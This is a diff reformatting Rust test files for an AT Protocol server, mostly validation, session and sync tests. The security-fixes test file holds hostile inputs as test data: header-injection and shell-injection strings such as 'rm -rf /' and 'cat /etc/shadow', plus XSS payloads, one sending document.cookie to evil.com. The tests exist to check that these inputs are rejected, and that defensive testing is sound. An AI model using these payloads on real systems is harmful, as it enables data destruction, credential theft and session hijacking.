211 291 } 212 292 213 293 #[test] ··· 220 300 "purpose": "app.bsky.graph.defs#modlist", 221 301 "createdAt": now() 222 302 }); 223 - assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid); 303 + assert_eq!( 304 + validator 305 + .validate(&valid_list, "app.bsky.graph.list") 306 + .unwrap(), 307 + ValidationStatus::Valid 308 + ); 224 309 225 310 let list_name_too_long = json!({ 226 311 "$type": "app.bsky.graph.list", ··· 228 313 "purpose": "app.bsky.graph.defs#modlist", 229 314 "createdAt": now() 230 315 }); 231 - assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 316 + assert!( 317 + matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name") 318 + ); 232 319 233 320 let list_empty_name = json!({ 234 321 "$type": "app.bsky.graph.list", ··· 236 323 "purpose": "app.bsky.graph.defs#modlist", 237 324 "createdAt": now() 238 325 }); 239 - assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 326 + assert!( 327 + matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name") 328 + ); 240 329 241 330 let valid_list_item = json!({ 242 331 "$type": "app.bsky.graph.listitem", ··· 244 333 "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 245 334 "createdAt": now() 246 335 }); 247 - assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid); 336 + assert_eq!( 337 + validator 338 + .validate(&valid_list_item, "app.bsky.graph.listitem") 339 + .unwrap(), 340 + ValidationStatus::Valid 341 + ); 248 342 } 249 343 250 344 #[test] ··· 257 351 "displayName": "My Feed", 258 352 "createdAt": now() 259 353 }); 260 - assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid); 354 + assert_eq!( 355 + validator 356 + .validate(&valid_generator, "app.bsky.feed.generator") 357 + .unwrap(), 358 + ValidationStatus::Valid 359 + ); 261 360 262 361 let generator_displayname_too_long = json!({ 263 362 "$type": "app.bsky.feed.generator", ··· 265 364 "displayName": "f".repeat(241), 266 365 "createdAt": now() 267 366 }); 268 - assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 367 + assert!( 368 + matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 369 + ); 269 370 270 371 let valid_threadgate = json!({ 271 372 "$type": "app.bsky.feed.threadgate", 272 373 "post": "at://did:plc:test/app.bsky.feed.post/123", 273 374 "createdAt": now() 274 375 }); 275 - assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid); 376 + assert_eq!( 377 + validator 378 + .validate(&valid_threadgate, "app.bsky.feed.threadgate") 379 + .unwrap(), 380 + ValidationStatus::Valid 381 + ); 276 382 277 383 let valid_labeler = json!({ 278 384 "$type": "app.bsky.labeler.service", ··· 281 387 }, 282 388 "createdAt": now() 283 389 }); 284 - assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid); 390 + assert_eq!( 391 + validator 392 + .validate(&valid_labeler, "app.bsky.labeler.service") 393 + .unwrap(), 394 + ValidationStatus::Valid 395 + ); 285 396 } 286 397 287 398 #[test] ··· 293 404 "$type": "com.custom.record", 294 405 "data": "test" 295 406 }); 296 - assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown); 297 - assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_)))); 407 + assert_eq!( 408 + validator 409 + .validate(&custom_record, "com.custom.record") 410 + .unwrap(), 411 + ValidationStatus::Unknown 412 + ); 413 + assert!(matches!( 414 + strict_validator.validate(&custom_record, "com.custom.record"), 415 + Err(ValidationError::UnknownType(_)) 416 + )); 298 417 299 418 let type_mismatch = json!({ 300 419 "$type": "app.bsky.feed.like", ··· 309 428 let missing_type = json!({ 310 429 "text": "Hello" 311 430 }); 312 - assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType))); 431 + assert!(matches!( 432 + validator.validate(&missing_type, "app.bsky.feed.post"), 433 + Err(ValidationError::MissingType) 434 + )); 313 435 314 436 let not_object = json!("just a string"); 315 - assert!(matches!(validator.validate(&not_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_)))); 437 + assert!(matches!( 438 + validator.validate(&not_object, "app.bsky.feed.post"), 439 + Err(ValidationError::InvalidRecord(_)) 440 + )); 316 441 317 442 let valid_datetime = json!({ 318 443 "$type": "app.bsky.feed.post", 319 444 "text": "Test", 320 445 "createdAt": "2024-01-15T10:30:00.000Z" 321 446 }); 322 - assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 447 + assert_eq!( 448 + validator 449 + .validate(&valid_datetime, "app.bsky.feed.post") 450 + .unwrap(), 451 + ValidationStatus::Valid 452 + ); 323 453 324 454 let datetime_with_offset = json!({ 325 455 "$type": "app.bsky.feed.post", 326 456 "text": "Test", 327 457 "createdAt": "2024-01-15T10:30:00+05:30" 328 458 }); 329 - assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 459 + assert_eq!( 460 + validator 461 + .validate(&datetime_with_offset, "app.bsky.feed.post") 462 + .unwrap(), 463 + ValidationStatus::Valid 464 + ); 330 465 331 466 let invalid_datetime = json!({ 332 467 "$type": "app.bsky.feed.post", 333 468 "text": "Test", 334 469 "createdAt": "2024/01/15" 335 470 }); 336 - assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. }))); 471 + assert!(matches!( 472 + validator.validate(&invalid_datetime, "app.bsky.feed.post"), 473 + Err(ValidationError::InvalidDatetime { .. }) 474 + )); 337 475 } 338 476 339 477 #[test] ··· 345 483 assert!(validate_record_key("valid~key").is_ok()); 346 484 assert!(validate_record_key("self").is_ok()); 347 485 348 - assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_)))); 486 + assert!(matches!( 487 + validate_record_key(""), 488 + Err(ValidationError::InvalidRecord(_)) 489 + )); 349 490 350 491 assert!(validate_record_key(".").is_err()); 351 492 assert!(validate_record_key("..").is_err()); ··· 355 496 assert!(validate_record_key("invalid@key").is_err()); 356 497 assert!(validate_record_key("invalid#key").is_err()); 357 498 358 - assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_)))); 499 + assert!(matches!( 500 + validate_record_key(&"k".repeat(513)), 501 + Err(ValidationError::InvalidRecord(_)) 502 + )); 359 503 assert!(validate_record_key(&"k".repeat(512)).is_ok()); 360 504 } 361 505 ··· 366 510 assert!(validate_collection_nsid("a.b.c").is_ok()); 367 511 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 368 512 369 - assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_)))); 513 + assert!(matches!( 514 + validate_collection_nsid(""), 515 + Err(ValidationError::InvalidRecord(_)) 516 + )); 370 517 371 518 assert!(validate_collection_nsid("a").is_err()); 372 519 assert!(validate_collection_nsid("a.b").is_err());
+31 -76
tests/security_fixes.rs
··· 1 1 mod common; 2 - use tranquil_pds::image::{ImageError, ImageProcessor}; 3 2 use tranquil_pds::comms::{SendError, is_valid_phone_number, sanitize_header_value}; 4 - use tranquil_pds::oauth::templates::{error_page, login_page, success_page}; 3 + use tranquil_pds::image::{ImageError, ImageProcessor}; 5 4 6 5 #[test] 7 6 fn test_header_injection_sanitization() { ··· 24 23 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 25 24 let sanitized = sanitize_header_value(header_injection); 26 25 assert_eq!(sanitized.split("\r\n").count(), 1); 27 - assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:")); 26 + assert!( 27 + sanitized.contains("Normal Subject") 28 + && sanitized.contains("Bcc:") 29 + && sanitized.contains("X-Injected:") 30 + ); 28 31 29 32 let with_null = "client\0id"; 30 33 assert!(sanitize_header_value(with_null).contains("client")); ··· 59 62 assert!(!is_valid_phone_number("+1(234)567890")); 60 63 assert!(!is_valid_phone_number("+1.234.567.890")); 61 64 62 - for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`", 63 - "+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help", 64 - "+123\r\n--version", "+123--help"] { 65 - assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious); 65 + for malicious in [ 66 + "+123; rm -rf /", 67 + "+123 && cat /etc/passwd", 68 + "+123`id`", 69 + "+123$(whoami)", 70 + "+123|cat /etc/shadow", 71 + "+123\n--help", 72 + "+123\r\n--version", 73 + "+123--help", 74 + ] { 75 + assert!( 76 + !is_valid_phone_number(malicious), 77 + "Command injection '{}' should be rejected", 78 + malicious 79 + ); 66 80 } 67 81 } 68 82 ··· 88 102 } 89 103 90 104 #[test] 91 - fn test_oauth_template_xss_protection() { 92 - let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None); 93 - assert!(!html.contains("<script>") && html.contains("&lt;script&gt;")); 94 - 95 - let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None); 96 - assert!(!html.contains("<img ") && html.contains("&lt;img")); 97 - 98 - let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None); 99 - assert!(!html.contains("<script>")); 100 - 101 - let html = login_page("client123", None, None, "test-uri", 102 - Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None); 103 - assert!(!html.contains("<script>")); 104 - 105 - let html = login_page("client123", None, None, "test-uri", None, 106 - Some("\" onfocus=\"alert('xss')\" autofocus=\"")); 107 - assert!(!html.contains("onfocus=\"alert") && html.contains("&quot;")); 108 - 109 - let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None); 110 - assert!(!html.contains("onmouseover=\"alert")); 111 - 112 - let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>")); 113 - assert!(!html.contains("<script>") && !html.contains("<img ")); 114 - 115 - let html = success_page(Some("<script>steal_session()</script>")); 116 - assert!(!html.contains("<script>")); 117 - 118 - for (page, name) in [ 119 - (login_page("client", None, None, "uri", None, None), "login"), 120 - (error_page("err", None), "error"), 121 - (success_page(None), "success"), 122 - ] { 123 - assert!(!page.contains("javascript:"), "{} page has javascript: URL", name); 124 - } 125 - 126 - let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None); 127 - assert!(html.contains("action=\"/oauth/authorize\"")); 128 - } 129 - 130 - #[test] 131 - fn test_oauth_template_html_escaping() { 132 - let html = login_page("client&test", None, None, "test-uri", None, None); 133 - assert!(html.contains("&amp;") && !html.contains("client&test")); 134 - 135 - let html = login_page("client\"test'more", None, None, "test-uri", None, None); 136 - assert!(html.contains("&quot;") || html.contains("&#34;")); 137 - assert!(html.contains("&#39;") || html.contains("&apos;")); 138 - 139 - let html = login_page("client<test>more", None, None, "test-uri", None, None); 140 - assert!(html.contains("&lt;") && html.contains("&gt;") && !html.contains("<test>")); 141 - 142 - let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), 143 - "valid-uri", None, Some("user@example.com")); 144 - assert!(html.contains("my-safe-client") || html.contains("My Safe App")); 145 - assert!(html.contains("read write") || html.contains("read")); 146 - assert!(html.contains("user@example.com")); 147 - 148 - let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None); 149 - assert!(!html.contains("onclick=\"alert")); 150 - 151 - let html = login_page("客户端 クライアント", None, None, "test-uri", None, None); 152 - assert!(html.contains("客户端") || html.contains("&#")); 153 - } 154 - 155 - #[test] 156 105 fn test_send_error_display() { 157 106 let timeout = SendError::Timeout; 158 107 assert!(!format!("{}", timeout).is_empty()); ··· 173 122 let base = base_url().await; 174 123 let http_client = client(); 175 124 176 - let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 177 - .send().await.unwrap(); 125 + let res = http_client 126 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 127 + .send() 128 + .await 129 + .unwrap(); 178 130 assert_eq!(res.status(), reqwest::StatusCode::OK); 179 131 let body: serde_json::Value = res.json().await.unwrap(); 180 132 assert_eq!(body["activated"], true); 181 133 182 134 let (token, _did) = create_account_and_login(&http_client).await; 183 - let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 135 + let res = http_client 136 + .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 184 137 .header("Authorization", format!("Bearer {}", token)) 185 - .send().await.unwrap(); 138 + .send() 139 + .await 140 + .unwrap(); 186 141 assert_eq!(res.status(), reqwest::StatusCode::OK); 187 142 let body: serde_json::Value = res.json().await.unwrap(); 188 143 assert_eq!(body["activated"], true);
+112 -33
tests/server.rs
··· 12 12 let health = client.get(format!("{}/health", base)).send().await.unwrap(); 13 13 assert_eq!(health.status(), StatusCode::OK); 14 14 assert_eq!(health.text().await.unwrap(), "OK"); 15 - let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap(); 15 + let describe = client 16 + .get(format!("{}/xrpc/com.atproto.server.describeServer", base)) 17 + .send() 18 + .await 19 + .unwrap(); 16 20 assert_eq!(describe.status(), StatusCode::OK); 17 21 let body: Value = describe.json().await.unwrap(); 18 22 assert!(body.get("availableUserDomains").is_some()); ··· 24 28 let base = base_url().await; 25 29 let handle = format!("user_{}", uuid::Uuid::new_v4()); 26 30 let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" }); 27 - let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 28 - .json(&payload).send().await.unwrap(); 31 + let create_res = client 32 + .post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 33 + .json(&payload) 34 + .send() 35 + .await 36 + .unwrap(); 29 37 assert_eq!(create_res.status(), StatusCode::OK); 30 38 let create_body: Value = create_res.json().await.unwrap(); 31 39 let did = create_body["did"].as_str().unwrap(); 32 40 let _ = verify_new_account(&client, did).await; 33 - let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 34 - .json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap(); 41 + let login = client 42 + .post(format!("{}/xrpc/com.atproto.server.createSession", base)) 43 + .json(&json!({ "identifier": handle, "password": "password" })) 44 + .send() 45 + .await 46 + .unwrap(); 35 47 assert_eq!(login.status(), StatusCode::OK); 36 48 let login_body: Value = login.json().await.unwrap(); 37 49 let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string(); 38 50 let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string(); 39 - let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base)) 40 - .bearer_auth(&refresh_jwt).send().await.unwrap(); 51 + let refresh = client 52 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", base)) 53 + .bearer_auth(&refresh_jwt) 54 + .send() 55 + .await 56 + .unwrap(); 41 57 assert_eq!(refresh.status(), StatusCode::OK); 42 58 let refresh_body: Value = refresh.json().await.unwrap(); 43 59 assert!(refresh_body["accessJwt"].as_str().is_some()); 44 60 assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt); 45 61 assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt); 46 - let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 47 - .json(&json!({ "password": "password" })).send().await.unwrap(); 48 - assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY); 62 + let missing_id = client 63 + .post(format!("{}/xrpc/com.atproto.server.createSession", base)) 64 + .json(&json!({ "password": "password" })) 65 + .send() 66 + .await 67 + .unwrap(); 68 + assert!( 69 + missing_id.status() == StatusCode::BAD_REQUEST 70 + || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY 71 + ); 49 72 let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 50 73 .json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" })) 51 74 .send().await.unwrap(); 52 75 assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST); 53 - let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base)) 54 - .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 76 + let unauth_session = client 77 + .get(format!("{}/xrpc/com.atproto.server.getSession", base)) 78 + .bearer_auth(AUTH_TOKEN) 79 + .send() 80 + .await 81 + .unwrap(); 55 82 assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED); 56 - let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base)) 57 - .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 83 + let delete_session = client 84 + .post(format!("{}/xrpc/com.atproto.server.deleteSession", base)) 85 + .bearer_auth(AUTH_TOKEN) 86 + .send() 87 + .await 88 + .unwrap(); 58 89 assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED); 59 90 } 60 91 ··· 63 94 let client = client(); 64 95 let base = base_url().await; 65 96 let (access_jwt, did) = create_account_and_login(&client).await; 66 - let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 67 - .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 97 + let res = client 98 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 99 + .bearer_auth(&access_jwt) 100 + .query(&[("aud", "did:web:example.com")]) 101 + .send() 102 + .await 103 + .unwrap(); 68 104 assert_eq!(res.status(), StatusCode::OK); 69 105 let body: Value = res.json().await.unwrap(); 70 106 let token = body["token"].as_str().unwrap(); ··· 76 112 assert_eq!(claims["iss"], did); 77 113 assert_eq!(claims["sub"], did); 78 114 assert_eq!(claims["aud"], "did:web:example.com"); 79 - let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 80 - .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")]) 81 - .send().await.unwrap(); 115 + let lxm_res = client 116 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 117 + .bearer_auth(&access_jwt) 118 + .query(&[ 119 + ("aud", "did:web:example.com"), 120 + ("lxm", "com.atproto.repo.getRecord"), 121 + ]) 122 + .send() 123 + .await 124 + .unwrap(); 82 125 assert_eq!(lxm_res.status(), StatusCode::OK); 83 126 let lxm_body: Value = lxm_res.json().await.unwrap(); 84 127 let lxm_token = lxm_body["token"].as_str().unwrap(); ··· 86 129 let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap(); 87 130 let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap(); 88 131 assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord"); 89 - let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 90 - .query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 132 + let unauth = client 133 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 134 + .query(&[("aud", "did:web:example.com")]) 135 + .send() 136 + .await 137 + .unwrap(); 91 138 assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED); 92 - let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 93 - .bearer_auth(&access_jwt).send().await.unwrap(); 139 + let missing_aud = client 140 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 141 + .bearer_auth(&access_jwt) 142 + .send() 143 + .await 144 + .unwrap(); 94 145 assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST); 95 146 } 96 147 ··· 99 150 let client = client(); 100 151 let base = base_url().await; 101 152 let (access_jwt, _) = create_account_and_login(&client).await; 102 - let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 103 - .bearer_auth(&access_jwt).send().await.unwrap(); 153 + let status = client 154 + .get(format!( 155 + "{}/xrpc/com.atproto.server.checkAccountStatus", 156 + base 157 + )) 158 + .bearer_auth(&access_jwt) 159 + .send() 160 + .await 161 + .unwrap(); 104 162 assert_eq!(status.status(), StatusCode::OK); 105 163 let body: Value = status.json().await.unwrap(); 106 164 assert_eq!(body["activated"], true); ··· 108 166 assert!(body["repoCommit"].is_string()); 109 167 assert!(body["repoRev"].is_string()); 110 168 assert!(body["indexedRecords"].is_number()); 111 - let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 112 - .send().await.unwrap(); 169 + let unauth_status = client 170 + .get(format!( 171 + "{}/xrpc/com.atproto.server.checkAccountStatus", 172 + base 173 + )) 174 + .send() 175 + .await 176 + .unwrap(); 113 177 assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED); 114 - let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 115 - .bearer_auth(&access_jwt).send().await.unwrap(); 178 + let activate = client 179 + .post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 180 + .bearer_auth(&access_jwt) 181 + .send() 182 + .await 183 + .unwrap(); 116 184 assert_eq!(activate.status(), StatusCode::OK); 117 - let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 118 - .send().await.unwrap(); 185 + let unauth_activate = client 186 + .post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 187 + .send() 188 + .await 189 + .unwrap(); 119 190 assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED); 120 - let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base)) 121 - .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 191 + let deactivate = client 192 + .post(format!( 193 + "{}/xrpc/com.atproto.server.deactivateAccount", 194 + base 195 + )) 196 + .bearer_auth(&access_jwt) 197 + .json(&json!({})) 198 + .send() 199 + .await 200 + .unwrap(); 122 201 assert_eq!(deactivate.status(), StatusCode::OK); 123 202 }
+33 -9
tests/session_management.rs
··· 20 20 .expect("Failed to send request"); 21 21 assert_eq!(res.status(), StatusCode::OK); 22 22 let body: Value = res.json().await.unwrap(); 23 - let sessions = body["sessions"].as_array().expect("sessions should be array"); 23 + let sessions = body["sessions"] 24 + .as_array() 25 + .expect("sessions should be array"); 24 26 assert!(!sessions.is_empty(), "Should have at least one session"); 25 - let current = sessions.iter().find(|s| s["isCurrent"].as_bool() == Some(true)); 27 + let current = sessions 28 + .iter() 29 + .find(|s| s["isCurrent"].as_bool() == Some(true)); 26 30 assert!(current.is_some(), "Should have a current session marked"); 27 31 let session = current.unwrap(); 28 32 assert!(session["id"].as_str().is_some(), "Session should have id"); 29 - assert!(session["createdAt"].as_str().is_some(), "Session should have createdAt"); 30 - assert!(session["expiresAt"].as_str().is_some(), "Session should have expiresAt"); 33 + assert!( 34 + session["createdAt"].as_str().is_some(), 35 + "Session should have createdAt" 36 + ); 37 + assert!( 38 + session["expiresAt"].as_str().is_some(), 39 + "Session should have expiresAt" 40 + ); 31 41 let _ = did; 32 42 } 33 43 ··· 84 94 assert_eq!(list_res.status(), StatusCode::OK); 85 95 let list_body: Value = list_res.json().await.unwrap(); 86 96 let sessions = list_body["sessions"].as_array().unwrap(); 87 - assert!(sessions.len() >= 2, "Should have at least 2 sessions, got {}", sessions.len()); 97 + assert!( 98 + sessions.len() >= 2, 99 + "Should have at least 2 sessions, got {}", 100 + sessions.len() 101 + ); 88 102 let _ = jwt1; 89 103 } 90 104 ··· 154 168 .expect("Failed to list sessions"); 155 169 let list_body: Value = list_res.json().await.unwrap(); 156 170 let sessions = list_body["sessions"].as_array().unwrap(); 157 - let other_session = sessions.iter().find(|s| s["isCurrent"].as_bool() != Some(true)); 158 - assert!(other_session.is_some(), "Should have another session to revoke"); 171 + let other_session = sessions 172 + .iter() 173 + .find(|s| s["isCurrent"].as_bool() != Some(true)); 174 + assert!( 175 + other_session.is_some(), 176 + "Should have another session to revoke" 177 + ); 159 178 let session_id = other_session.unwrap()["id"].as_str().unwrap(); 160 179 let revoke_res = client 161 180 .post(format!( ··· 179 198 .expect("Failed to list sessions after revoke"); 180 199 let list_after_body: Value = list_after_res.json().await.unwrap(); 181 200 let sessions_after = list_after_body["sessions"].as_array().unwrap(); 182 - let revoked_still_exists = sessions_after.iter().any(|s| s["id"].as_str() == Some(session_id)); 183 - assert!(!revoked_still_exists, "Revoked session should not appear in list"); 201 + let revoked_still_exists = sessions_after 202 + .iter() 203 + .any(|s| s["id"].as_str() == Some(session_id)); 204 + assert!( 205 + !revoked_still_exists, 206 + "Revoked session should not appear in list" 207 + ); 184 208 let _ = jwt1; 185 209 } 186 210
+113 -31
tests/sync_deprecated.rs
··· 10 10 let client = client(); 11 11 let (did, jwt) = setup_new_user("gethead").await; 12 12 let res = client 13 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 13 + .get(format!( 14 + "{}/xrpc/com.atproto.sync.getHead", 15 + base_url().await 16 + )) 14 17 .query(&[("did", did.as_str())]) 15 - .send().await.expect("Failed to send request"); 18 + .send() 19 + .await 20 + .expect("Failed to send request"); 16 21 assert_eq!(res.status(), StatusCode::OK); 17 22 let body: Value = res.json().await.expect("Response was not valid JSON"); 18 23 assert!(body["root"].is_string()); 19 24 let root1 = body["root"].as_str().unwrap().to_string(); 20 25 assert!(root1.starts_with("bafy"), "Root CID should be a CID"); 21 26 let latest_res = client 22 - .get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await)) 27 + .get(format!( 28 + "{}/xrpc/com.atproto.sync.getLatestCommit", 29 + base_url().await 30 + )) 23 31 .query(&[("did", did.as_str())]) 24 - .send().await.expect("Failed to get latest commit"); 32 + .send() 33 + .await 34 + .expect("Failed to get latest commit"); 25 35 let latest_body: Value = latest_res.json().await.unwrap(); 26 36 let latest_cid = latest_body["cid"].as_str().unwrap(); 27 - assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid"); 37 + assert_eq!( 38 + root1, latest_cid, 39 + "getHead root should match getLatestCommit cid" 40 + ); 28 41 create_post(&client, &did, &jwt, "Post to change head").await; 29 42 let res2 = client 30 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 43 + .get(format!( 44 + "{}/xrpc/com.atproto.sync.getHead", 45 + base_url().await 46 + )) 31 47 .query(&[("did", did.as_str())]) 32 - .send().await.expect("Failed to get head after record"); 48 + .send() 49 + .await 50 + .expect("Failed to get head after record"); 33 51 let body2: Value = res2.json().await.unwrap(); 34 52 let root2 = body2["root"].as_str().unwrap().to_string(); 35 53 assert_ne!(root1, root2, "Head CID should change after record creation"); 36 54 let not_found_res = client 37 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 55 + .get(format!( 56 + "{}/xrpc/com.atproto.sync.getHead", 57 + base_url().await 58 + )) 38 59 .query(&[("did", "did:plc:nonexistent12345")]) 39 - .send().await.expect("Failed to send request"); 60 + .send() 61 + .await 62 + .expect("Failed to send request"); 40 63 assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST); 41 64 let error_body: Value = not_found_res.json().await.unwrap(); 42 65 assert_eq!(error_body["error"], "HeadNotFound"); 43 66 let missing_res = client 44 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 45 - .send().await.expect("Failed to send request"); 67 + .get(format!( 68 + "{}/xrpc/com.atproto.sync.getHead", 69 + base_url().await 70 + )) 71 + .send() 72 + .await 73 + .expect("Failed to send request"); 46 74 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 47 75 let empty_res = client 48 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 76 + .get(format!( 77 + "{}/xrpc/com.atproto.sync.getHead", 78 + base_url().await 79 + )) 49 80 .query(&[("did", "")]) 50 - .send().await.expect("Failed to send request"); 81 + .send() 82 + .await 83 + .expect("Failed to send request"); 51 84 assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST); 52 85 let whitespace_res = client 53 - .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 86 + .get(format!( 87 + "{}/xrpc/com.atproto.sync.getHead", 88 + base_url().await 89 + )) 54 90 .query(&[("did", " ")]) 55 - .send().await.expect("Failed to send request"); 91 + .send() 92 + .await 93 + .expect("Failed to send request"); 56 94 assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST); 57 95 } 58 96 ··· 61 99 let client = client(); 62 100 let (did, jwt) = setup_new_user("getcheckout").await; 63 101 let empty_res = client 64 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 102 + .get(format!( 103 + "{}/xrpc/com.atproto.sync.getCheckout", 104 + base_url().await 105 + )) 65 106 .query(&[("did", did.as_str())]) 66 - .send().await.expect("Failed to send request"); 107 + .send() 108 + .await 109 + .expect("Failed to send request"); 67 110 assert_eq!(empty_res.status(), StatusCode::OK); 68 111 let empty_body = empty_res.bytes().await.expect("Failed to get body"); 69 - assert!(!empty_body.is_empty(), "Even empty repo should return CAR header"); 112 + assert!( 113 + !empty_body.is_empty(), 114 + "Even empty repo should return CAR header" 115 + ); 70 116 create_post(&client, &did, &jwt, "Post for checkout test").await; 71 117 let res = client 72 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 118 + .get(format!( 119 + "{}/xrpc/com.atproto.sync.getCheckout", 120 + base_url().await 121 + )) 73 122 .query(&[("did", did.as_str())]) 74 - .send().await.expect("Failed to send request"); 